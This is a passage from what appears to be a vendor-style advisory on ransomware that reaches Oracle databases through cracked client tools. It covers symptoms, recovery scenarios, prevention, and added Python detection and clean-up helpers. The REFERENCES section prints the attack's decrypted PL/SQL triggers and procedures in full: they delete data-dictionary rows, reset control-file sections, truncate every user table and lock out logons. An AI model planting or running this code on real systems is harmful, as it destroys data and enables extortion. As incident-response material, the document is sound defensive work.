The "Bitcoin attack" on databases and how to defend against it

ALERT: The database is at risk of a Bitcoin attack

APPLIES TO:
Oracle Database - any Edition - any Version
Information in this document applies to any platform.

DESCRIPTION
Users connecting to the database through a client tool, or the database alert log, report errors such as ORA-20312/ORA-20313/ORA-20315 stating that the database has been locked and that Bitcoin must be sent to a given address to unlock it.

OCCURRENCE
The customer connects to the database with a maliciously modified "portable" or cracked client tool (for example a cracked PL/SQL Developer or Toad). Once the connection succeeds, the tool runs an injected SQL script (Login.sql, AfterConnect.sql, toad.ini and the like) that executes malicious code and creates three triggers and four stored procedures in the database. When the database is restarted or a user logs on, the triggers call the corresponding stored procedures, which may damage the database and raise error and ransom messages.

SYMPTOMS
Users connecting to the database through a client tool, or the database alert log, report errors such as ORA-20312/ORA-20313/ORA-20315 stating that the database has been locked and that Bitcoin must be sent to a given address to unlock it. The injected scripts pretend to be Oracle internal scripts:

    --
    -- Copyright (c) 1988, 2011, Oracle and/or its affiliates.
    -- All rights reserved.
    --
    -- NAME
    --   login.sql
    --
    -- DESCRIPTION
    --   PL/SQL global login "site profile" file
    --
    --   Add any PL/SQL commands here that are to be executed when a
    --   user starts PL/SQL, or uses the PL/SQL CONNECT command.
    --
    -- USAGE
    --   This script is automatically run
    --
    --   This SQL was created by Oracle ; You should never remove/delete it!
    -- MODIFIED   (MM/DD/YY)
    -- ...

The two known error messages are as follows.

Example 1: Alert.log entry:

    Thu Apr 13 13:48:55 2017
    Errors in file /oracle/diag/rdbms/liantiaodb/liantiaodb/trace/liantiaodb_ora_5213.trc:
    ORA-00604: 遞歸 SQL 級別 1 出現錯誤
    ORA-20315: 你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小寫一致) 以後把你的Oracle SID郵寄地址 sqlrush@mail.com 咱們將讓你知道如何解鎖你的數據庫 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.
    ORA-06512: 在 "AIQRY.DBMS_CORE_INTERNAL ", line 25
    ORA-06512: 在 line 2

Example 2: the error reported when connecting to the database with a client.

The database contains encrypted (wrapped) stored procedures with the following names (note that the first three quoted names end in a space):

    "DBMS_SUPPORT_INTERNAL "
    "DBMS_SYSTEM_INTERNAL "
    "DBMS_CORE_INTERNAL "
    "DBMS_STANDARD_FUN9"

and three triggers with the following names:

    "DBMS_SUPPORT_INTERNAL "
    "DBMS_SYSTEM_INTERNAL "
    "DBMS_CORE_INTERNAL "

WORKAROUND
None

SOLUTION
The handling for the Bitcoin attack cases found so far is as follows:

1. Remove the maliciously modified client software.
2. Proceed according to the situation:

Scenario 1: SYSDATE-MIN(LAST_ANALYZED) is less than 1200 days
  Database damage: none
  Handling:
  a. Drop the three triggers: "DBMS_SUPPORT_INTERNAL ", "DBMS_SYSTEM_INTERNAL ", "DBMS_CORE_INTERNAL "
  b. Drop the four stored procedures: "DBMS_SUPPORT_INTERNAL ", "DBMS_SYSTEM_INTERNAL ", "DBMS_CORE_INTERNAL ", "DBMS_STANDARD_FUN9"

Scenario 2: SYSDATE-MIN(LAST_ANALYZED) is greater than 1200 days, and either SYSDATE-CREATED is greater than 1200 days but the database has not been restarted, or SYSDATE-CREATED is less than 1200 days
  Database damage: some tables have been truncated
  Handling:
  a. Drop the three triggers and the four stored procedures
  b. Restore the tables from backup to their state before the truncate
  c. Recover with DUL (not every table can necessarily be recovered, for example if the truncated space has already been reused)

Scenario 3: SYSDATE-CREATED is greater than 1200 days and the database has been restarted
  Database damage: some tables have been truncated and rows have been deleted from tab$
  Handling:
  a. Drop the three triggers and the four stored procedures
  b. Restore the tables from backup to their state before the truncate
  c. Restore tab$ from the table whose name begins with ORACHK
  d. Recover with DUL (not every table can necessarily be recovered, for example if the truncated space has already been reused)

Preventive measures against the Bitcoin attack:

1. Monitor the database for the triggers and stored procedures named above, and drop them promptly.
2. Restrict the use of DBA privileges.
3. Check the start-up scripts of the login tools and clean out risky scripts:
   glogin.sql/login.sql for SQL*Plus
   toad.ini for Toad
   login.sql/AfterConnect.sql for PL/SQL Developer
4. Download tools from the vendor's official site; do not use "portable" or cracked versions.

REFERENCES
Code of the three triggers:

    PROMPT Create "DBMS_SUPPORT_INTERNAL "
    -- fires once per instance start: the destructive procedure
    create or replace trigger "DBMS_SUPPORT_INTERNAL "
    after startup on database
    begin
      "DBMS_SUPPORT_INTERNAL ";
    end;
    /

    -- fires for every logon to the database
    CREATE OR REPLACE TRIGGER "DBMS_SYSTEM_INTERNAL "
    AFTER LOGON ON DATABASE
    BEGIN
      "DBMS_SYSTEM_INTERNAL ";
    END;
    /

    -- fires for logons to the schema that ran the infected client
    CREATE OR REPLACE TRIGGER "DBMS_CORE_INTERNAL "
    AFTER LOGON ON SCHEMA
    BEGIN
      "DBMS_CORE_INTERNAL ";
    END;
    /

The four encrypted (wrapped) stored procedures, after decryption:

    PROCEDURE "DBMS_SUPPORT_INTERNAL " IS
      DATE1 INT := 10;
      E1 EXCEPTION;
      PRAGMA EXCEPTION_INIT(E1, -20312);
    BEGIN
      -- age of the database in days
      SELECT NVL(TO_CHAR(SYSDATE-CREATED),0) INTO DATE1 FROM V$DATABASE;
      IF (DATE1>=1200) THEN
        -- keep a copy of tab$ under a random ORACHK... name, then delete every
        -- non-SYS table entry from the data dictionary
        EXECUTE IMMEDIATE 'create table ORACHK'||SUBSTR(SYS_GUID,10)||' tablespace system as select * from sys.tab$';
        DELETE SYS.TAB$ WHERE DATAOBJ# IN (SELECT DATAOBJ# FROM SYS.OBJ$ WHERE OWNER# NOT IN (0,38));
        COMMIT;
        EXECUTE IMMEDIATE 'alter system checkpoint';
        -- clear control file record sections (backup metadata)
        SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(11);
        SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(12);
        SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(13);
        SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(14);
        -- flood the alert log with the ransom note
        FOR I IN 1..2046 LOOP
          DBMS_SYSTEM.KSDWRT(2, 'Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.');
          DBMS_SYSTEM.KSDWRT(2, '你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小寫一致) 以後把你的Oracle SID郵寄地址 sqlrush@mail.com 咱們將讓你知道如何解鎖你的數據庫');
        END LOOP;
        RAISE E1;
      END IF;
    EXCEPTION
      WHEN E1 THEN
        RAISE_APPLICATION_ERROR(-20312, '你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小寫一致) 以後把你的Oracle SID郵寄地址 sqlrush@mail.com 咱們將讓你知道如何解鎖你的數據庫 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.');
      WHEN OTHERS THEN
        NULL;
    END;
    /

    PROCEDURE "DBMS_SYSTEM_INTERNAL " IS
      DATE1 INT := 10;
      E1 EXCEPTION;
      PRAGMA EXCEPTION_INIT(E1, -20313);
    BEGIN
      -- age of the oldest optimizer statistics on non-system tables
      SELECT NVL(TO_CHAR(SYSDATE-MIN(LAST_ANALYZED)),0) INTO DATE1
        FROM ALL_TABLES WHERE TABLESPACE_NAME NOT IN ('SYSTEM','SYSAUX','EXAMPLE');
      IF (DATE1>=1200) THEN
        -- every client except the attacker's own tool is refused
        IF (UPPER(SYS_CONTEXT('USERENV', 'MODULE'))!='C89239.EXE') THEN
          RAISE E1;
        END IF;
      END IF;
    EXCEPTION
      WHEN E1 THEN
        RAISE_APPLICATION_ERROR(-20313, '你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小寫一致) 以後把你的Oracle SID郵寄地址 sqlrush@mail.com 咱們將讓你知道如何解鎖你的數據庫 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.');
      WHEN OTHERS THEN
        NULL;
    END;
    /

    PROCEDURE "DBMS_CORE_INTERNAL " IS
      V_JOB NUMBER;
      DATE1 INT := 10;
      STAT VARCHAR2(2000);
      V_MODULE VARCHAR2(2000);
      E1 EXCEPTION;
      PRAGMA EXCEPTION_INIT(E1, -20315);
      -- every ordinary table of the logged-on user, except its own ORACHK copies
      CURSOR TLIST IS
        SELECT * FROM USER_TABLES
         WHERE TABLE_NAME NOT LIKE '%$%' AND TABLE_NAME NOT LIKE '%ORACHK%' AND CLUSTER_NAME IS NULL;
    BEGIN
      SELECT NVL(TO_CHAR(SYSDATE-MIN(LAST_ANALYZED)),0) INTO DATE1
        FROM ALL_TABLES WHERE TABLESPACE_NAME NOT IN ('SYSTEM','SYSAUX','EXAMPLE');
      IF (DATE1>=1200) THEN
        -- queue one background job per table; each job truncates it via DBMS_STANDARD_FUN9
        FOR I IN TLIST LOOP
          DBMS_OUTPUT.PUT_LINE('table_name is ' ||I.TABLE_NAME);
          STAT:='truncate table '||USER||'.'||I.TABLE_NAME;
          DBMS_JOB.SUBMIT(V_JOB, 'DBMS_STANDARD_FUN9(''' || STAT || ''');', SYSDATE);
          COMMIT;
        END LOOP;
      END IF;
      -- unlike DBMS_SYSTEM_INTERNAL, this check is outside the age test:
      -- logon to the schema is refused regardless of the database's age
      IF (UPPER(SYS_CONTEXT('USERENV', 'MODULE'))!='C89239.EXE') THEN
        RAISE E1;
      END IF;
    EXCEPTION
      WHEN E1 THEN
        RAISE_APPLICATION_ERROR(-20315, '你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小寫一致) 以後把你的Oracle SID郵寄地址 sqlrush@mail.com 咱們將讓你知道如何解鎖你的數據庫 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.');
      WHEN OTHERS THEN
        RAISE_APPLICATION_ERROR(-20315, '你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小寫一致) 以後把你的Oracle SID郵寄地址 sqlrush@mail.com 咱們將讓你知道如何解鎖你的數據庫 Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive), after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.');
    END;
    /

    -- generic DDL executor: the jobs above pass it the TRUNCATE statements
    PROCEDURE DBMS_STANDARD_FUN9(V_DDL IN VARCHAR2) IS
    BEGIN
      EXECUTE IMMEDIATE V_DDL;
    END;
    /
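The OCCURRENCE and SYMPTOMS sections above point at two places where this infection shows up before any table is lost: the client start-up scripts that carry the injected code, and the alert log entries the triggers produce. The following indicator scanner is an added example written for this page, not code from the original support note. The function names, the sample login.sql/glogin.sql contents and the sample alert-log lines are all constructed for the demonstration; the indicator strings and object names are taken from the note's banner, error text and procedure bodies.

```python
"""Indicator scan for the SQL RUSH Team 'Bitcoin attack' described above.

Added example, not code from the original support note.  It checks the two
places the note points at: client start-up scripts (login.sql, glogin.sql,
AfterConnect.sql, toad.ini) for the injected banner and object names, and
alert-log lines for the ORA-20312/20313/20315 ransom errors plus the ORA-06512
stack line that names the schema owning the malicious object.  All sample
script and log text below is constructed for the demonstration.
"""
import re
from dataclasses import dataclass, field

# Object names from the note.  The attacker's identifiers are double-quoted
# WITH A TRAILING SPACE, e.g. "DBMS_SUPPORT_INTERNAL ", so we match the quoted
# form as well as the bare upper-cased name.
MALICIOUS_OBJECTS = (
    "DBMS_SUPPORT_INTERNAL ",
    "DBMS_SYSTEM_INTERNAL ",
    "DBMS_CORE_INTERNAL ",
    "DBMS_STANDARD_FUN9",
)

# Literal strings that appear in the note's fake banner and procedure bodies.
SCRIPT_INDICATORS = (
    "You should never remove/delete it!",       # fake 'Oracle' banner line
    "SQL RUSH Team",
    "sqlrush@mail.com",
    "166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE",
    "DBMS_SYSTEM.KSDWRT",                       # used to flood the alert log
    "DBMS_BACKUP_RESTORE.RESETCFILESECTION",    # clears control file sections
)

RANSOM_ORA_CODES = {"ORA-20312", "ORA-20313", "ORA-20315"}
ORA_RE = re.compile(r"\b(ORA-\d{5})\b")
# ORA-06512: at "OWNER.OBJECT NAME", line N   (the object name may end in a space)
STACK_RE = re.compile(r'ORA-06512:.*?"([^".]+)\.([^"]+)"')


@dataclass
class ScriptFinding:
    path: str
    indicators: list = field(default_factory=list)
    objects: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.indicators or self.objects)


def scan_login_script(path: str, text: str) -> ScriptFinding:
    """Flag a client start-up script whose text carries the note's indicators."""
    finding = ScriptFinding(path)
    finding.indicators = [s for s in SCRIPT_INDICATORS if s in text]
    upper = text.upper()
    finding.objects = [o for o in MALICIOUS_OBJECTS
                       if f'"{o}"' in text or o.strip() in upper]
    return finding


def scan_alert_log(lines) -> list:
    """Return (line_no, ORA code) pairs for ransom errors found in alert-log lines."""
    hits = []
    for n, line in enumerate(lines, 1):
        for code in sorted(set(ORA_RE.findall(line)) & RANSOM_ORA_CODES):
            hits.append((n, code))
    return hits


def implicated_objects(lines) -> set:
    """Collect (owner, object) from ORA-06512 stack lines that name a malicious object.

    The AFTER LOGON ON SCHEMA trigger lives in the schema of the account that ran
    the infected client, so the owner tells you which account to review first.
    """
    found = set()
    for line in lines:
        m = STACK_RE.search(line)
        if m and m.group(2) in MALICIOUS_OBJECTS:
            found.add((m.group(1), m.group(2).strip()))
    return found


# --- constructed samples (not real files or logs) ---------------------------
INFECTED_LOGIN_SQL = """\
-- Copyright (c) 1988, 2011, Oracle and/or its affiliates.
-- This SQL was created by Oracle ; You should never remove/delete it!
set termout off
create or replace trigger "DBMS_SYSTEM_INTERNAL " after logon on database
begin "DBMS_SYSTEM_INTERNAL "; end;
/
set termout on
"""
CLEAN_GLOGIN_SQL = "set linesize 200\nset pagesize 100\n"

SAMPLE_ALERT_LOG = [
    "Thu Apr 13 13:48:55 2017",
    "Errors in file /oracle/diag/rdbms/demo/demo/trace/demo_ora_5213.trc:",
    "ORA-00604: error occurred at recursive SQL level 1",
    "ORA-20315: Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin ...",
    'ORA-06512: at "AIQRY.DBMS_CORE_INTERNAL ", line 25',
    "ORA-06512: at line 2",
    "Thread 1 advanced to log sequence 42 (LGWR switch)",
]


def main():
    for path, text in (("login.sql", INFECTED_LOGIN_SQL), ("glogin.sql", CLEAN_GLOGIN_SQL)):
        f = scan_login_script(path, text)
        print(f"{path}: {'SUSPICIOUS' if f.suspicious else 'clean'} {f.indicators} {f.objects}")
    print("alert log hits:", scan_alert_log(SAMPLE_ALERT_LOG))
    print("implicated objects:", implicated_objects(SAMPLE_ALERT_LOG))


if __name__ == "__main__":
    main()
```

Run the script scanner over the start-up script locations listed under prevention measure 3 on every workstation that has connected with a third-party client, and the log scanner over the alert log of each instance. In the note's own alert-log example the stack line names `AIQRY.DBMS_CORE_INTERNAL`, which identifies AIQRY as the schema whose logon from an infected client planted the objects.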
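The SOLUTION section above chooses among three scenarios using the same two age measurements the decrypted procedures test against their hard-coded 1200-day threshold, and each scenario begins by dropping the seven objects. The triage helper below is an added example for this page, not part of the original note. It encodes that decision, reports the damage the procedure bodies in the REFERENCES section would have caused, checks catalog names against the malicious object list, and generates DROP statements that keep the trailing space inside the quoted identifiers. The class and function names are mine; the day counts fed in are constructed, and on a live system they come from the catalog queries named in the comments.

```python
"""Triage and clean-up helper for the three scenarios in the SOLUTION section.

Added example, not code from the original support note.  Inputs are the two
age measurements the malicious procedures use (both compared with 1200 days)
plus whether the instance has been restarted since infection.  Sample inputs
below are constructed.
"""
from dataclasses import dataclass

THRESHOLD_DAYS = 1200   # hard-coded in all three malicious procedures

TRIGGERS = ("DBMS_SUPPORT_INTERNAL ", "DBMS_SYSTEM_INTERNAL ", "DBMS_CORE_INTERNAL ")
PROCEDURES = TRIGGERS + ("DBMS_STANDARD_FUN9",)


@dataclass(frozen=True)
class DbAge:
    days_since_created: float        # SYSDATE - CREATED, from V$DATABASE
    days_since_min_analyzed: float   # SYSDATE - MIN(LAST_ANALYZED), from ALL_TABLES
                                     # outside SYSTEM/SYSAUX/EXAMPLE tablespaces
    restarted_since_infection: bool  # has the AFTER STARTUP trigger had a chance to fire?


def classify(age: DbAge) -> int:
    """Scenario number from the note: 1 = no damage, 2 = truncates, 3 = truncates + tab$."""
    startup_fired = age.days_since_created >= THRESHOLD_DAYS and age.restarted_since_infection
    logon_armed = age.days_since_min_analyzed >= THRESHOLD_DAYS
    if startup_fired:
        return 3
    if logon_armed:
        return 2
    return 1


def expected_damage(age: DbAge) -> dict:
    """What the procedure bodies would have done, derived from their conditions."""
    startup_fired = age.days_since_created >= THRESHOLD_DAYS and age.restarted_since_infection
    logon_armed = age.days_since_min_analyzed >= THRESHOLD_DAYS
    return {
        # DBMS_SUPPORT_INTERNAL: copy tab$ to ORACHK<guid>, delete non-SYS rows,
        # reset control file sections 11-14, write 2 x 2046 ransom lines to the alert log
        "tab$_rows_deleted": startup_fired,
        "orachk_copy_of_tab$_exists": startup_fired,
        "controlfile_sections_reset": startup_fired,
        # DBMS_CORE_INTERNAL: one DBMS_JOB per user table calling DBMS_STANDARD_FUN9('truncate ...')
        "user_tables_truncated": logon_armed,
        # DBMS_SYSTEM_INTERNAL raises ORA-20313 only once the stats are old enough
        "logons_blocked_for_all_users": logon_armed,
        # DBMS_CORE_INTERNAL raises ORA-20315 for the infected schema regardless of age
        "logons_blocked_for_infected_schema": True,
    }


def is_malicious_object(name: str) -> bool:
    """Compare a DBA_OBJECTS.OBJECT_NAME value; tolerate the trailing space either way."""
    return name.rstrip() in {n.rstrip() for n in PROCEDURES}


def drop_statements(owner: str) -> list:
    """DDL to remove the seven objects from OWNER's schema.

    The names must stay double-quoted with their trailing space: an unquoted
    DROP TRIGGER DBMS_SUPPORT_INTERNAL is normalised to a different identifier
    and does not match the attacker's object.
    """
    return ([f'DROP TRIGGER "{owner}"."{t}";' for t in TRIGGERS]
            + [f'DROP PROCEDURE "{owner}"."{p}";' for p in PROCEDURES])


# --- constructed measurements for three hypothetical databases --------------
EXAMPLES = {
    "young-db":          DbAge(300, 400, True),
    "old-db-no-restart": DbAge(1500, 1300, False),
    "old-db-restarted":  DbAge(1500, 1300, True),
}


def main():
    for label, age in EXAMPLES.items():
        print(f"{label}: scenario {classify(age)} {expected_damage(age)}")
    for ddl in drop_statements("AIQRY"):
        print(ddl)


if __name__ == "__main__":
    main()
```

Because DBMS_CORE_INTERNAL queues its TRUNCATE statements through DBMS_JOB, dropping the procedures is not the whole clean-up: jobs already submitted still reference DBMS_STANDARD_FUN9, so also review DBA_JOBS for entries whose WHAT column mentions that name and remove them. That step is not in the note; it follows from the procedure body reproduced in REFERENCES.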